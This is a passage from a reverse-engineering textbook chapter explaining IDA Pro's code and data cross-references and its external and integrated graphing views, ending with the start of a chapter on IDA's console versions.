tion. In most cases, an ordinary flow is also assigned to call instructions, as

most functions return to the location that follows the call. If IDA believes

that a function does not return (as determined during the analysis phase),

then calls to that function will not have an ordinary flow assigned. Call flows

are noted by the display of cross-references at the target function (the desti-

nation address of the flow). The resulting disassembly of the callflow func-

tion is shown here:

.text:00401000 callflow proc near ; CODE XREF: _main+20Èp

.text:00401000 ; _main:loc_401054Èp

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 pop ebp

.text:00401004 retn

.text:00401004 callflow endp

In this example, two cross-references are displayed at the address of

callflow to indicate that the function is called twice. The address displayed

in the cross-references is displayed as an offset into the calling function

unless the calling address has an associated name, in which case the name is

used. Both forms of addresses are used in the cross-references shown here.

Cross-references resulting from function calls are distinguished through use

of the p suffix (think P for Procedure).

A jump flow is assigned to each unconditional and conditional branch

instruction. Conditional branches are also assigned ordinary flows to account

for control flow when the branch is not taken. Unconditional branches have

no associated ordinary flow because the branch is always taken in such cases.

The dashed line break at \ is a display device used to indicate that an ordi-

nary flow does not exist between two adjacent instructions. Jump flows are

associated with jump-style cross-references displayed at the target of the jump,

as shown at ]. As with call-style cross-references, jump cross-references dis-

play the address of the referring location (the source of the jump). Jump

cross-references are distinguished by the use of a j suffix (think J for Jump).

Data Cross-References

Data cross-references are used to track the manner in which data is accessed

within a binary. Data cross-references can be associated with any byte in an

IDA database that is associated with a virtual address (in other words, data

cross-references are never associated with stack variables). The three most

commonly encountered types of data cross-references are used to indicate

172 Chapter 9

when a location is being read, when a location is being written, and when the

address of a location is being taken. The global variables associated with the

previous example program are shown here, as they provide several examples

of data cross-references.

.data:0040B720 read_it dd ? ; DATA XREF: _main+EÇr

.data:0040B720 ; _main+25Çr

.data:0040B724 write_it dd ? ; DATA XREF: _main+1BÇw

.data:0040B724 a; _main+2EÇw ...

.data:0040B728 ref_it db ? ; ; DATA XREF: _main+4Ço

.data:0040B729 db ? ;

.data:0040B72A db ? ;

.data:0040B72B db ? ;

A read cross-reference is used to indicate that the contents of a memory loca-

tion are being accessed. Read cross-references can originate only from an

instruction address but may refer to any program location. The global vari-

able read_it is read at locations marked ^ in Listing 9-1. The associated cross-

reference comments shown in this listing indicate exactly which locations in

main are referencing read_it and are recognizable as read cross-references

based on the use of the r suffix. The first read performed on read_it is a 32-

bit read into the ECX register, which leads IDA to format read_it as a dword

(dd). In general IDA takes as many cues as it possibly can in order to deter-

mine the size and/or type of variables based on how they are accessed and

how they are used as parameters to functions.

The global variable write_it is referenced at the locations marked _

in Listing 9-1. Associated write cross-references are generated and displayed as

comments for the write_it variable, indicating the program locations that

modify the contents of the variable. Write cross-references utilize the w suffix.

Here again, IDA has determined the size of the variable based on the fact

that the 32-bit EAX register is copied into write_it. Note that the list of cross-

references displayed at write_it terminates with an ellipsis (a above), indi-

cating that the number of cross-references to write_it exceeds the current

display limit for cross-references. This limit can be modified through the Num-

ber of displayed xrefs setting on the Cross-references tab in the Options

General dialog. As with read cross-references, write cross-references can origi-

nate only from a program instruction but may reference any program location.

Generally speaking, a write cross-reference that targets a program instruction

byte is indicative of self-modifying code, which is usually considered bad form

and is frequently encountered in the de-obfuscation routines used in malware.

The third type of data cross-reference, an offset cross-reference, indicates

that the address of a location is being used (rather than the content of the

location). The address of global variable ref_it is taken at location ` in List-

ing 9-1, resulting in the offset cross-reference comment at ref_it in the

previous listing (suffix o). Offset cross-references are commonly the result

of pointer operations either in code or in data. Array access operations,

for example, are typically implemented by adding an offset to the starting

address of the array. As a result, the first address in most global arrays can

Cross-References and Graphing 173

often be recognized by the presence of an offset cross-reference. For this rea-

son, most string data (strings being arrays of characters in C/C++) is the tar-

get of offset cross-references.

Unlike read and write cross-references, which can originate only from

instruction locations, offset cross-references can originate from either instruc-

tion locations or data locations. An example of an offset that can originate

from a program’s data section is any table of pointers (such as a vtable) that

results in the generation of an offset cross-reference from each location

within the table to the location being pointed to by those locations. You can

see this if you examine the vtable for class SubClass from Chapter 8, whose

disassembly is shown here:

.rdata:00408148 off_408148 dd offset SubClass::vfunc1(void) ; DATA XREF: SubClass::SubClass(void)+12Ço

.rdata:0040814C dd offset BaseClass::vfunc2(void)

.rdata:00408150 dd offset SubClass::vfunc3(void)

.rdata:00408154 dd offset BaseClass::vfunc4(void)

.rdata:00408158 dd offset SubClass::vfunc5(void)

Here you see that the address of the vtable is used in the function

SubClass::SubClass(void), which is the class constructor. The header lines

for function SubClass::vfunc3(void), shown here, show the offset cross-

reference that links the function to a vtable.

.text:00401080 public: virtual void __thiscall SubClass::vfunc3(void) proc near

.text:00401080 ; DATA XREF: .rdata:00408150Èo

This example demonstrates one of the characteristics of C++ virtual func-

tions that becomes quite obvious when combined with offset cross-references,

namely that C++ virtual functions are never called directly and should never be

the target of a call cross-reference. Instead, all C++ virtual functions should be

referred to by at least one vtable entry and should always be the target of at

least one offset cross-reference. Remember that overriding a virtual function

is not mandatory. Therefore, a virtual function can appear in more than one

vtable, as discussed in Chapter 8. Backtracking offset cross-references is one

technique for easily locating C++ vtables in a program’s data section.

Cross-Reference Lists

With an understanding of what cross-references are, we can now discuss the

manner in which you may access all of this data within IDA. As mentioned

previously, the number of cross-reference comments that can be displayed

at a given location is limited by a configuration setting that defaults to 2. As

long as the number of cross-references to a location does not exceed this

limit, then working with those cross-references is fairly straightforward.

Mousing over the cross-reference text displays the disassembly of the source

region in a tool tip–style display, while double-clicking the cross-reference

address jumps the disassembly window to the source of the cross-reference.

174 Chapter 9

There are two methods for viewing the complete list of cross-references

to a location. The first method is to open a cross-references subview associ-

ated with a specific address. By positioning the cursor on an address that is

the target of one or more cross-references and selecting ViewOpen

SubviewsCross-References, you can open the complete list of cross-

references to a given location, as shown in Figure 9-3, which shows the

complete list of cross-references to variable write_it.

Figure 9-3: Cross-reference display window

The columns of the window indicate the direction (Up or Down) to the

source of the cross-reference, the type of cross-reference (using the type suf-

fixes discussed previously), the source address of the cross-reference, and the

corresponding disassembled text at the source address, including any com-

ments that may exist at the source address. As with other windows that display

lists of addresses, double-clicking any entry repositions the disassembly display

to the corresponding source address. Once opened, the cross-reference dis-

play window remains open and accessible via a title tab displayed along with

every other open subview’s title tab above the disassembly area.

The second way to access a list of cross-references is to highlight a name

that you are interested in learning about and choose JumpJump to xref

(hotkey CTRL-X) to open a dialog that lists every location that references the

selected symbol. The resulting dialog, shown in Figure 9-4, is nearly identical

in appearance to the cross-reference subview shown in Figure 9-3. In this

case, the dialog was activated using the CTRL-X hotkey with the first instance

of write_it (.text:0040102B) selected.

Figure 9-4: Jump to cross-reference dialog

The primary difference in the two displays is behavioral. Being a modal

dialog,1 the display in Figure 9-4 has buttons to interact with and terminate

1. A modal dialog must be closed before you can continue normal interaction with the

underlying application. Modeless dialogs can remain open while you continue normal

interaction with the application.

Cross-References and Graphing 175

the dialog. The primary purpose of this dialog is to select a referencing loca-

tion and jump to it. Double-clicking one of the listed locations dismisses the

dialog and repositions the disassembly window at the selected location. The

second difference between the dialog and the cross-reference subview is that

the former can be opened using a hotkey or context-sensitive menu from any

instance of a symbol, while the latter can be opened only when you position

the cursor on an address that is the target of a cross-reference and choose

ViewOpen SubviewsCross-References. Another way of thinking about it

is that the dialog can be opened at the source of any cross-reference, while

the subview can be opened only at the destination of the cross-reference.

An example of the usefulness of cross-reference lists might be to rapidly

locate every location from which a particular function is called. Many people

consider the use of the C strcpy2 function to be dangerous. Using cross-

references, locating every call to strcpy is as simple as finding any one call to

strcpy, using the CTRL-X hotkey to bring up the cross-reference dialog, and

working your way through every call cross-reference. If you don’t want to take

the time to find strcpy used somewhere in the binary, you can even get away

with adding a comment with the text strcpy in it and activating the cross-

reference dialog using the comment.3

Function Calls

A specialized cross-reference listing dealing exclusively with function calls

is available by choosing ViewOpen SubviewsFunction Calls. Figure 9-5

shows the resulting dialog, which lists all locations that call the current func-

tion (as defined by the cursor location at the time the view is opened) in the

upper half of the window and all calls made by the current function in the

lower half of the window.

Figure 9-5: Function calls window

Here again, each listed cross-reference can be used to quickly reposition

the disassembly listing to the corresponding cross-reference location. Restrict-

ing ourselves to considering function call cross-references allows us to think

about more abstract relationships than simple mappings from one address to

2. The C strcpy function copies a source array of characters, up to and including the associated

null termination character, to a destination array, with no checks whatsoever that the destination

array is large enough to hold all of the characters from the source.

3. When a symbol name appears in a comment, IDA treats that symbol just as if it was an operand

in a disassembled instruction. Double-clicking the symbol repositions the disassembly window,

and the right-click context-sensitive menu becomes available.

176 Chapter 9

another and instead consider how functions relate to one another. In the

next section, we show how IDA takes advantage of this by providing several

types of graphs, all designed to assist you in interpreting a binary.

IDA Graphing

Because cross-references relate one address to another, they are a natural

place to begin if we want to make graphs of our binaries. By restricting our-

selves to specific types of cross-references, we can derive a number of useful

graphs for analyzing our binaries. For starters, cross-references serve as the

edges (the lines that connect points) in our graphs. Depending on the type

of graph we wish to generate, individual nodes (the points in the graph) can

be individual instructions, groups of instructions called basic blocks, or entire

functions. IDA has two distinct graphing capabilities: an external graphing

capability utilizing a bundled graphing application and an integrated, inter-

active graphing capability. Both of these graphing capabilities are covered in

the following sections.

IDA External (Third-Party) Graphing

IDA’s external graphing capability utilizes third-party graphing applications

to display IDA-generated graph files. For Windows versions prior to 6.1, IDA

ships with a bundled graphing application named wingraph32.4 For IDA 6.0,

non-Windows versions of IDA are configured to use the dotty5 graph viewer

by default. Beginning with IDA 6.1, all versions of IDA ship with and are

configured to use the qwingraph6 graph viewer, which is a cross-platform Qt

port of wingraph32. While the dotty configuration options remain visible for

Linux users, they are commented out by default. The graph viewer used

by IDA may be configured by editing the GRAPH_VISUALIZER variable in

<IDADIR>/cfg/ida.cfg.

Whenever an external-style graph is requested, the source for the graph

is generated and saved to a temporary file; then the designated third-party

graph viewer is launched to display the graph. IDA supports two graph speci-

fication languages, Graph Description Language7 (GDL) and the DOT8 lan-

guage utilized by the graphviz9 project. The graph specification language used

by IDA may be configured by editing the GRAPH_FORMAT variable in <IDADIR>/

cfg/ida.cfg. Legal values for this variable are DOT and GDL. You must ensure that

the language you specify here is compatible with the viewer you have speci-

fied in GRAPH_VISUALIZER.

4. Hex-Rays makes the source for wingraph32 available at http://www.hex-rays.com/idapro/freefiles/

wingraph32_src.zip.

5. dotty is a graph viewing tool included as part of the graphviz project.

6. Hex-Rays makes the source for qwingraph available at http://www.hex-rays.com/idapro/freefiles/

qwingraph_src.zip.

7. A GDL reference can be found at http://www.absint.com/aisee/manual/windows/node58.html.

8. A DOT reference can be found at http://www.graphviz.org/doc/info/lang.html.

9. See http://www.graphviz.org/.

Cross-References and Graphing 177

Five types of graphs may be generated from the ViewGraphs submenu.

Available external mode graphs include the following:

zFunction flowchart

zCall graph for the entire binary

zGraph of cross-references to a symbol

zGraph of cross-references from a symbol

zCustomized cross-reference graph

For two of these, the flowchart and the call graph, IDA is capable of gen-

erating and saving GDL (not DOT) files for use independently of IDA. These

options may be found on the FileProduce file submenu. Saving the specifi-

cation file for other types of graphs may be possible if your configured graph

viewer allows you to save the currently displayed graph. A number of limita-

tions exist when dealing with any external graph. First and foremost is the

fact that external graphs are not interactive. Manipulation of displayed exter-

nal graphs is limited by the capabilities of your chosen external graph viewer

(often only zooming and panning).

External Flowcharts

With the cursor positioned within a function, ViewGraphsFlow

Chart (hotkey F12) generates and displays an external flowchart. The flow-

chart display is the external graph that most closely resembles IDA’s inte-

grated graph-based disassembly view. These are not the flowcharts you may

have been taught during an introductory programming class. Instead, these

BASIC BLOCKS

In a computer program, a basic block is a grouping of one or more instructions

with a single entry to the beginning of the block and a single exit from the end of

the block. In general, other than the last instruction, every instruction within a basic

block transfers control to exactly one successor instruction within the block. Similarly,

other than the first instruction, every instruction in a basic block receives control from

exactly one predecessor instruction within the block. For the purposes of basic block

determination, the fact that function call instructions transfer control outside the cur-

rent function is generally ignored unless it is known that the function being called

fails to return normally. An important behavioral characteristic of basic blocks is that

once the first instruction in a basic block is executed, the remainder of the block is

guaranteed to execute to completion. This can factor significantly into runtime instru-

mentation of a program, since it is no longer necessary to set a breakpoint on every

instruction in a program or even single-step the program in order to record which

instructions have executed. Instead, breakpoints can be set on the first instruction of

each basic block, and as each breakpoint is hit, every instruction in its associated

block can be marked as executed. The Process Stalker component of Pedram Amini’s

PaiMei* framework performs in exactly this manner.

*Please see http://pedram.redhive.com/code/paimei/.

178 Chapter 9

graphs might better be named “control flow graphs,” as they group a func-

tion’s instructions into basic blocks and use edges to indicate flow from one

block to another.

Figure 9-6 shows a portion of the flowchart of a relatively simple func-

tion. As you can see, external flowcharts offer very little in the way of address

information, which can make it difficult to correlate the flowchart view to its

corresponding disassembly listing.

Figure 9-6: External flowchart graph

Flowchart graphs are derived by following the ordinary and jump flows for

each instruction in a function, beginning with the entry point to the function.

External Call Graphs

A function call graph is useful for gaining a quick understanding of the hier-

archy of function calls made within a program. Call graphs are generated

by creating a graph node for each function and then connecting function

nodes based on the existence of a call cross-reference from one function to

another. The process of generating a call graph for a single function can be

viewed as a recursive descent through all of the functions that are called from

the initial function. In many cases, it is sufficient to stop descending the call

tree once a library function is reached, as it is easier to learn how the library

function operates by reading documentation associated with the library

rather than by attempting to reverse engineer the compiled version of the

function. In fact, in the case of a dynamically linked binary it is not possible

to descend into library functions, since the code for such functions is not

present within the dynamically linked binary. Statically linked binaries present

a different challenge when generating graphs. Since statically linked binaries

contain all of the code for the libraries that have been linked to the program,

related function call graphs can become extremely large.

Cross-References and Graphing 179

In order to discuss function call graphs, we make use of the following

trivial program that does nothing other than create a simple hierarchy of

function calls:

#include <stdio.h>

void depth_2_1() {

printf("inside depth_2_1\n");

}

void depth_2_2() {

fprintf(stderr, "inside depth_2_2\n");

}

void depth_1() {

depth_2_1();

depth_2_2();

printf("inside depth_1\n");

}

int main() {

depth_1();

}

After compiling a dynamically linked binary using GNU gcc, we can ask

IDA to generate a function call graph using ViewGraphsFunction Calls,

which should yield a graph similar to that shown in Figure 9-7. In this instance

we have truncated the left side of the graph somewhat in order to offer a bit

more detail. The call graph associated with the main function can be seen

within the circled area in the figure.

Figure 9-7: External function call graph

180 Chapter 9

Alert readers may notice that the compiler has substituted calls to puts

and fwrite for printf and fprintf, respectively, as they are more efficient

when printing static strings. Note that IDA utilizes different colors to repre-

sent different types of nodes in the graph, though the colors are not config-

urable in any way.10

Given the straightforward nature of the previous program listing, why

does the graph appear to be twice as crowded as it should be? The answer is

that the compiler, as virtually all compilers do, has inserted wrapper code

responsible for library initialization and termination as well as for configur-

ing parameters properly prior to transferring control to the main function.

Attempting to graph a statically linked version of the same program

results in the nasty mess shown in Figure 9-8.

The graph in Figure 9-8 demonstrate a behavior of external graphs

in general, namely that they are always scaled initially to display the entire

graph, which can result in very cluttered displays. For this particular graph,

the status bar at the bottom of the WinGraph32 window indicates that there

are 946 nodes and 10,125 edges that happen to cross over one another in

100,182 locations. Other than demonstrating the complexity of statically

linked binaries, this graph is all but unusable. No amount of zooming and

panning will simplify the graph, and beyond that, there is no way to easily

locate a specific function such as main other than by reading the label on each

node. By the time you have zoomed in enough to be able to read the labels

associated with each node, only a few dozen nodes will fit within the display.

Figure 9-8: Function call graph in a statically linked binary

External Cross-Reference Graphs

Two types of cross-reference graphs can be generated for global symbols

(functions or global variables): cross-references to a symbol (ViewGraphs

Xrefs To) and cross-references from a symbol (ViewGraphsXrefs From).

To generate an Xrefs To graph, a recursive ascent is performed by backtrack-

ing all cross-references to the selected symbol until a symbol to which no other

symbols refer is reached. When analyzing a binary, you can use an Xrefs To

10. The graphs depicted in this chapter have been edited outside of IDA to remove node

coloring for the purposes of improving readability.

Cross-References and Graphing 181

graph to answer the question, “What sequence of calls must be made to

reach this function?” Figure 9-9 shows the use of an Xrefs To graph to display

the paths that can be followed to reach the puts function.

Figure 9-9: Xrefs To graph

Similarly, Xrefs To graphs can assist you in visualizing all of the locations

that reference a global variable and the chain of function calls required to

reach those locations. Cross-reference graphs are the only graphs capable of

incorporating data cross-reference information.

In order to create an Xrefs From graph, a recursive descent is performed

by following cross-references from the selected symbol. If the symbol is a

function name, only call references from the function are followed, so data

references to global variables do not show up in the graph. If the symbol is

an initialized global pointer variable (meaning that it actually points to some-

thing), then the corresponding data offset cross-reference is followed. When

you graph cross-references from a function, the effective behavior is a func-

tion call graph rooted at the selected function, as shown in Figure 9-10.

Unfortunately, the same cluttered graph problems exist when graphing

functions with a complex call graph.

182 Chapter 9

Figure 9-10: Xrefs From graph

Custom Cross-Reference Graphs

Custom cross-reference graphs, called User xref charts in IDA, provide the

maximum flexibility in generating cross-reference graphs to suit your needs.

In addition to combining cross-references to a symbol and cross-references

from a symbol into a single graph, custom cross-reference graphs allow you

to specify a maximum recursion depth and the types of symbols that should

be included or excluded from the resulting graph.

ViewGraphsUser Xrefs Chart opens the graph customization dialog

shown in Figure 9-11. Each global symbol that occurs within the specified

address range appears as a node within the resulting graph, which is con-

structed according to the options specified in the dialog. In the most com-

mon case, generating cross-references from a single symbol, the start and

end addresses are identical. If the start and end addresses differ, then the

resulting graph is generated for all nonlocal symbols that occur within the

specified range. In the extreme case where the start address is the lowest

address in the database and the end address is the highest address in the

database, the resulting graph degenerates to the function call graph for the

entire binary.

Cross-References and Graphing 183

Figure 9-11: User cross-reference graph dialog

The options that are selected in Figure 9-11 represent the default

options for all custom cross-reference graphs. Following is a description of

the purpose of each set of options:

Starting direction

Options allow you to decide whether to search for cross-references from

the selected symbol, to the selected symbol, or both. If all other options

are left at their default settings, restricting the starting direction to Cross

references to results in an Xrefs To–style graph, while restricting direc-

tion to Cross references from generates an Xrefs From–style graph.

Parameters

The Recursive option enables recursive descent (Xrefs From) or ascent

(Xrefs To) from the selected symbols. Follow only current direction

forces any recursion to occur in only one direction. In other words, if

this option is selected, and node B is discovered to be reachable from

node A, the recursive descent into B adds additional nodes that can be

reached only from node B. Newly discovered nodes that refer to node B

will not be added to the graph. If you choose to deselect Follow only cur-

rent direction, then when both starting directions are selected, each new

node added to the graph is recursed in both the to and from directions.

Recursion depth

This option sets the maximum recursion depth and is useful for limiting

the size of generated graphs. A setting of −1 causes recursion to proceed

as deep as possible and generates the largest possible graphs.

184 Chapter 9

Ignore

These options dictate what types of nodes will be excluded from the gen-

erated graph. This is another means of restricting the size of the result-

ing graph. In particular, ignoring cross-references from library functions

can lead to drastic simplifications of graphs in statically linked binaries.

The trick is to make sure that IDA recognizes as many library functions

as possible. Library code recognition is the subject of Chapter 12.

Print options

These options control two aspects of graph formatting. Print comments

causes any function comments to be included in a function’s graph

node. If Print recursion dots is selected and recursion would continue

beyond the specified recursion limit, a node containing an ellipsis is dis-

played to indicate that further recursion is possible.

Figure 9-12 shows a custom cross-reference graph generated for function

depth_1 in our example program using default options and a recursion depth

of 1.

Figure 9-12: User xref graph for function depth_1

Cross-References and Graphing 185

User-generated cross-reference graphs are the most powerful external-

mode graphing capability available in IDA. External flowcharts have largely

been superseded by IDA’s integrated graph-based disassembly view, and the

remaining external graph types are simply canned versions of user-generated

cross-reference graphs.

IDA’s Integrated Graph View

With version 5.0, IDA introduced a long-awaited interactive, graph-based dis-

assembly view that was tightly integrated into IDA. As mentioned previously,

the integrated graphing mode provides an alternative interface to the stan-

dard text-style disassembly listing. While in graph mode, disassembled func-

tions are displayed as control flow graphs similar to external-style flowchart

graphs. Because a function-oriented control flow graph is used, only one

function at a time can be displayed while in graph mode, and graph mode

cannot be used for instructions that lie outside any function. For cases in

which you wish to view several functions at once, or when you need to view

instructions that are not part of a function, you must revert to the text-ori-

ented disassembly listing.

We detailed basic manipulation of the graph view in Chapter 5, but we

reiterate a few points here. Switching between text view and graph view is

accomplished by pressing the spacebar or right-clicking anywhere in the dis-

assembly window and selecting either Text View or Graph View as appropri-

ate. The easiest way to pan around the graph is to click the background of

the graph view and drag the graph in the appropriate direction. For large

graphs, you may find it easier to pan using the Graph Overview window

instead. The Graph Overview window always displays a dashed rectangle

around the portion of the graph currently being displayed in the disassembly

window. At any time, you can click and drag the dashed rectangle to reposi-

tion the graph display. Because the graph overview window displays a minia-

ture version of the entire graph, using it for panning eliminates the need to

constantly release the mouse button and reposition the mouse as required

when panning across large graphs in the disassembly window.

There are no significant differences between manipulating a disassembly

in graph mode and manipulating a disassembly in text mode. Double-click

navigation continues to work as you would expect it to, as does the navigation

history list. Any time you navigate to a location that does not lie within a func-

tion (such as a global variable), the display will automatically switch to text

mode. Graph mode will automatically be restored once you navigate back to

a function. Access to stack variables is identical to that of text mode, with the

summary stack view being displayed in the root basic block of the displayed

function. Detailed stack frame views are accessed by double-clicking any stack

variable, just as in text mode. All options for formatting instruction oper-

ands in text mode remain available and are accessed in the same manner in

graph mode.

186 Chapter 9

The primary user interface change related to graph mode deals with the

handing of individual graph nodes. Figure 9-13 shows a simple graph node

and its related title bar button controls.

Figure 9-13: Typical expanded graph view node

From left to right, the three buttons on the node’s title bar allow you to

change the background color of the node, assign or change the name of the

node, and access the list of cross-references to the node. Coloring nodes is a

useful way to remind yourself that you have already analyzed a node or to

simply make it stand out from others, perhaps because it contains code of

particular interest. Once you assign a node a color, the color is also used as

the background color for the corresponding instructions in text mode. To

easily remove any coloring, right-click the node’s title bar and select Set node

color to default.

The middle button on the title bar in Figure 9-13 is used to assign a

name to the address of the first instruction of the node’s basic block. Since

basic blocks are often the target of jump instructions, many nodes may

already have a dummy name assigned as the result of being targeted by a

jump cross-reference. However, it is possible for a basic block to begin with-

out having a name assigned. Consider the following lines of code:

.text:00401041 Xjg short loc_401053

.text:00401043 Ymov ecx, [ebp+arg_0]

The instruction at X has two potential successors, loc_401053 and the

instruction at Y. Because it has two successors, X must terminate a basic

block, which results in Y becoming the first instruction in a new basic block,

even though it is not targeted explicitly by a jump and thus has no dummy

name assigned.

The rightmost button in Figure 9-13 is used to access the list of cross-

references that target the node. Since cross-reference comments are not dis-

played by default in graph mode, this is the easiest way to access and navigate

to any location that references the node. Unlike the cross-reference lists we

have discussed previously, the generated node cross-reference list also con-

tains an entry for the ordinary flow into the node (designated by type ^). This

is required because it is not always obvious in graph view which node is the

linear predecessor of a given node. If you wish to view normal cross-reference

Cross-References and Graphing 187

comments in graph mode, access the Cross-References tab under Options

General and set the Number of displayed xrefs option to something other

than zero.

Nodes within a graph may be grouped either by themselves or with other

nodes in order to reduce some of the clutter in a graph. To group multiple

nodes, CTRL-click the title bar of each node to be grouped and then right-

click the title bar of any selected node and select Group nodes. You will be

prompted to enter some text (defaults to the first instruction in the group) to

be displayed in the collapsed node. Figure 9-14 shows the result of grouping

the node in Figure 9-13 and changing the node text to collapsed node demo.

Figure 9-14: Typical collapsed (grouped) graph view node

Note that two additional buttons are now present in the title bar. In left-

to-right order, these buttons allow you to uncollapse (expand) the grouped

node and edit the node text. Uncollapsing a node merely expands the nodes

within a group to their original form; it does not change the fact that the

node or nodes now belong to a group. When a group is uncollapsed, the two

new buttons just mentioned are removed and replaced with a single Collapse

Group button. An expanded group can easily be collapsed again using the

Collapse Group button or by right-clicking the title bar of any node in the

group and selecting Hide Group. To completely remove a grouping applied

to one or more nodes, you must right-click the title bar of the collapsed node

or one of the participating uncollapsed nodes and select Ungroup Nodes.

This action has the side effect of expanding the group if it was collapsed at

the time.

Summary

Graphs are a powerful tool available to assist you in analyzing any binary. If

you are accustomed to viewing disassemblies in pure text format, it may take

some time to adjust to using a graph-based display. In IDA, it is generally a

matter of realizing that all of the information that was available in the text

display remains available in the graph display; however, it may be formatted

somewhat differently. Cross-references, for example, become the edges that

connect the basic blocks in a graph display.

Choosing the proper graph to view plays an important role in optimizing

the use of graphs for analysis. If you want to know how a particular function is

reached, then you are probably interested in a function call or cross-reference

graph. If you want to know how a specific instruction is reached, then you are

probably more interested in a control flow graph.

188 Chapter 9

Some of the frustration that users have experienced in the past with

IDA’s graphing capabilities is directly attributable to the inflexibility of

the wingraph32 application and its related graphs. These frustrations were

addressed in part with the introduction of an integrated graph-based disas-

sembly mode. IDA is primarily a disassembler, however, and graph genera-

tion is not its primary purpose. Readers interested in dedicated graph-based

analysis tools may wish to investigate applications designed specifically for

that purpose, such as BinNavi,11 produced by Halvar Flake’s company

Zynamics.12

11. See http://www.zynamics.com/binnavi.html.

12. Note that Zynamics was acquired by Google in March 2011.

JMP

EBP

SUB

THE MANY FACES OF IDA

For many years, the Windows GUI version

was the superstar in the IDA stable. Since

the release of IDA version 6.0 this is no

longer the case, as Linux and OS X users can

now enjoy GUI versions of IDA for their platforms.

However, this new version in no way changes the fact

that there are several alternative ways to use IDA. The

original version of IDA was actually an MS-DOS console application, and the

console version remains available on all platforms to this day. With built-in

remote debugging capabilities, IDA is a powerful multiplatform analysis and

debugging tool.

Beyond its interactive capabilities, IDA offers a batch-processing mode in

all of its versions to facilitate automated processing of large numbers of files.

The key to effective batch processing with IDA is to understand what each

version can and cannot do and choose the appropriate version of IDA to suit

your requirements. In this chapter we discuss IDA’s console version and how

to make the most of IDA’s batch-processing facilities.

190 Chapter 10

Console Mode IDA

The heart of all console versions of IDA is a Borland-developed, console I/O

library called TVision that has been ported to several platforms, including

Windows, Linux, and Mac OS X, among others. Hex-Rays makes the source

code for its current TVision port available to paying IDA customers on its

IDA download page.1

The use of a common library across all platforms keeps the user interface

consistent on all of the console versions. There are a few annoyances to deal

with in moving from platform to platform, however, such as varying degrees

of support for the mouse, resizing, and the ability to pass hotkeys to the IDA

application. We discuss some of the problems and, when available,

workarounds in the platform-specific sections that follow.

Common Features of Console Mode

As the term console mode implies, the text-based versions of IDA all run within

a terminal or shell of some sort. These consoles may have varying degrees of

support for resizing and the use of a mouse, resulting in limitations that you

will need to learn to live with. The types of limitations depend on which plat-

form and terminal program you are using.

The console user interface consists of a menu bar across the top line of

the display to show menu options and status and a common operations bar

across the bottom line of the display that’s similar to a text-based toolbar.

Available operations are activated using hotkeys or, when supported, by click-

ing the mouse. Virtually every command available in the GUI version is avail-

able in some form in the console version, and most of the hotkey associations

are preserved as well.

The IDA display windows consume the space between the upper menu

bar and the lower command bar. However, a common limitation, regardless

of which terminal program you happen to use, is that there is little display

room when the screen is limited to roughly 80 by 25 characters and no

graphics. Therefore, console versions of IDA typically open only two display

windows by default: the disassembly window and the messages window. In

order to approximate the tabbed display windows found in the GUI version,

IDA uses the TVision library’s overlapping windowing capability for text win-

dows and assigns the F6 key (in lieu of window title tabs) to cycle through

available open windows. Each window is numbered sequentially, and the win-

dow ID is present in the upper left-hand corner.

When mouse support is available in your console, it is possible to resize

an IDA display window by clicking and dragging the lower right corner of the

display window to the desired size. To reposition a display window, you click

and drag the display’s top border. Lacking mouse support, you can move and

resize individual displays via WindowResize/Move (CTRL-F5) and then use

your arrow keys to move and SHIFT-arrow keys to resize the active window.

If your terminal program can be resized using the mouse, IDA recognizes the

new terminal size and expands (or shrinks) to fill it as appropriate.

1. See http://www.hex-rays.com/idapro/idadown.htm.

The Many Faces of IDA 191

Without graphics capability, the integrated graph-based disassembly

mode is not available, and no control-flow arrows are displayed in the left

margin of the disassembly listing window. However, all subviews available in

the GUI version are available in the console versions. As in the GUI version,

the majority of subviews are accessible via the ViewOpen Subviews menu.

The one major difference in available displays is that hex dumps are not

available as a unique subview. Instead, you can toggle a disassembly to a hex

dump and back using OptionsDump/Normal View (CTRL-F4). In order to

have both a disassembly and a hex view open simultaneously, you must open

a second disassembly window (ViewOpen SubviewsDisassembly) and tog-

gle the new view to a hex dump. Unfortunately, there is no way to synchro-

nize the new hex dump to the existing disassembly view.

With mouse support, navigating your way around the disassembly remains

much the same as the GUI version, where double-clicking any name takes

you to the corresponding address. Alternatively, positioning the cursor on a

name and pressing ENTER causes the display to jump to the corresponding

named location (this also happens to work in the GUI version). Pressing

ENTER while the cursor is positioned on the name of a stack variable opens

the detailed stack frame view for the associated function. Without mouse sup-

port, the menus work similarly to many other console applications, employ-

ing the ALT-x method of menu navigation, where x is a highlighted character

on the current screen.

Windows Console Specifics

The Windows cmd.exe (command.exe on the Windows 9x family) terminal is not

terribly flexible, but it is fairly well supported by IDA’s console version. The

Windows console version of IDA is named idaw.exe, while the GUI version

is named idag.exe. The corresponding versions for 64-bit binaries (available

with the advanced version of IDA) are named idaw64.exe and idag64.exe,

respectively.

In order for IDA’s mouse support to work in Windows, you must ensure

that QuickEdit mode is disabled for the terminal in which you are running

IDA. To configure QuickEdit mode as one of the terminal’s properties, right-

click the terminal’s title bar and select Properties; then deselect QuickEdit

mode on the Options tab. You must do this prior to launching IDA, as the

change will not be recognized while IDA is running.

Unlike Linux terminals running under X Windows, cmd.exe cannot be

expanded by using the mouse to enlarge the window. On Windows only,

IDA’s console version offers the WindowSet Video Mode menu option

to resize cmd.exe to one of six fixed terminal sizes, up to a maximum of 255

by 100.

While no graph mode is available in the disassembly window, IDA’s

external graphing options are available. Selections from the ViewGraphs

menu will cause IDA to launch the configured graph viewer (such as

qwingraph) to display the resulting graph. For Windows versions of IDA, it

is possible to open several graphs at once and continue to use IDA while

the graphs are open.

192 Chapter 10

Linux Console Specifics

The Linux console version of IDA is named idal (or idal64 for analyzing

64-bit binaries). Prior to IDA 6.0, Linux and OS X console versions were

included as standard components of your IDA distribution. As such, when

you copy these console versions to your Linux or OS X platform, you must

also copy your IDA key file (ida.key) so that your console version will run

properly. Note that this requires that you install IDA on a Windows machine

at least once, even if you never intend to run the Windows version. On Unix-

style systems you may alternatively copy your key file to $HOME/.idapro/

ida.key. If you do not create it, IDA automatically creates the IDA personal

settings directory ($HOME/.idapro) the first time you launch IDA.

IDA 6.x installations are much simpler. Because IDA 6.x is purchased for

a specific platform, the installation procedure on your platform takes care of

installing the GUI version, the console version, and your IDA key file to suit-

able locations.

Basic navigation in the Linux version is similar to navigation in the Win-

dows console version; several Linux specifics are addressed in this section.

Users’ tastes for Linux terminal programs are as varied as their tastes for

Linux distributions in general. IDA includes a file named tvtuning.txt that

